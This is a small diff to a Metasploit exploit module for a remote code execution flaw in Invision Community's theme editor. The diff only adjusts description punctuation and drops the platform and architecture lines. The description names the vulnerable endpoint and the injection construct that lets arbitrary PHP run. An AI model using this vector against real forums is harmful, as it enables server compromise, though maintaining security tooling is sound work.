@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           Invision Community up to and including version 5.0.6 contains a remote code
           execution vulnerability in the theme editor's customCss endpoint. By crafting
-          a specially formatted `content` parameter with a `{expression="…"}`
+          a specially formatted `content` parameter with a `{expression="..."}`
           construct, arbitrary PHP can be evaluated. This module leverages that flaw
           to execute payloads or system commands as the webserver user.
         },
@@ -32,8 +32,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://invisioncommunity.com']
         ],
         'License' => MSF_LICENSE,
-        'Platform' => %w[php unix linux win],
-        'Arch' => [ARCH_PHP, ARCH_CMD],
         'Targets' => [
           [
             'PHP In-Memory',
